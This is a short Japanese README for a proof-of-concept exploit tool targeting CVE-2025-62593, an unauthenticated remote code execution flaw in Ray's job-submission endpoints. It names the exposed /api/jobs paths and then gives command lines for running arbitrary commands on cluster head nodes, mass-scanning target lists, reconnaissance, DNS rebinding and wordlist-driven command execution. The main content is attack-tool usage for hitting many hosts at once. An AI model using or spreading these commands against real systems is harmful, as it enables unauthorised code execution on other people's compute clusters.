
CVE-2025-62593 — Ray Unauthenticated RCE Exploit は、Ray 分散 AI コンピュートエンジンにおける認証なしのリモートコード実行の脆弱性です。
CVE-2025-62593 は、Ray分散AIコンピューティングエンジンにおける未認証のリモートコード実行の脆弱性です。
根本原因は、重要なHTTPエンドポイント(/api/jobs、/api/job_agent/jobs)における認証の欠如です。
攻撃者は、エントリポイントが任意のコマンドであるRayジョブを送信し、クラスタのヘッドノード上でそれを実行できます。
# 単一ターゲット
python3 ray_rce_poc.py --target http://HOST:8265
# 大量スキャン(10並行)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json
# 偵察モード(クイック列挙)
python3 ray_rce_poc.py --recon --targets list.txt
# DNSリバインディングモード
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1
# ワードリストスキャン
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv
/api/jobs//api/jobs//api/jobs/{id}/logs